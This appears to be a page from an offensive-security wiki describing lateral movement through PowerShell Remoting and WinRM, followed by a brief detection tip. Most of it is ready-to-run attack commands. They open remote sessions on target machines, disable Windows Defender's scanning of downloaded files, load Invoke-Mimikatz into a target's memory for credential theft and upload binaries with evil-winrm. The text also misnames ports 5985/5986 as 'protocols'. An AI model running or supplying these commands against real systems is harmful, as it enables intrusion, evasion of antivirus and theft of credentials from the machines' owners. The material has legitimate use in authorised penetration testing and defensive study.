Powershell Remoting - WinRM

Par défaut, il faut obligatoirement disposer de droit d'administrateur sur la machine cible.

Windows Remote Management enables server hardware management and is also how Microsoft employs WMI over HTTP(S). Unlike traditional web traffic, it doesn't utilize protocol 80/443, but instead uses protocols 5985 (HTTP) and 5986 (HTTPS).

WinRM comes pre-installed with Windows but requires some configuration to be used. An exception to this rule pertains to server operating systems, as it has been enabled by default since 2012R2 and onwards.

WinRM requires a port to be listening for a WINRM connection on the victim machine. This can be done via the command in Powershell, or remotely via WMI and Powershell:

Enable-PSRemoting -Force

With Windows Powershell:

Create a session:

$sess = New-PSSession -ComputerName <TARGET_COMPUTER>
Enter-PSSession -Session $sess

Execute command on the opened session

# Injecting the "whoami" command into a list of machines
Invoke-command -ScriptBlock {whoami} -ComputerName (Get-Content <list_of_servers>)

# Executing a command in the created session ( DisableIOAVProtection indicates whether Windows Defender scans all downloaded files and attachments).
Invoke-command -ScriptBlock {Set-MpPreference -DisableIOAVProtection $true} -Session $sess

# Loading a PowerShell script directly into the memory of the targeted machine
Invoke-command -Filepath C:\AD\Tools\Invoke-Mimikatz.ps1 -Session $sess

# Calling a PowerShell function
Invoke-command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess

With Evil-WinRm:

evil-winrm -i <IP> -u <USERNAME> -p <PASSWORD> -s /path/to/binary/you_want_to_upload

Detection :

Outbound network connections can be searched for with a destination port of 5985/5986. The process start event for wsmprovhost.exe can be observed (with a "-Embedding" parameter in the command line arguments).

PreviousDCOMExec / DCOM NextCrackmapexec

Last updated 8 months ago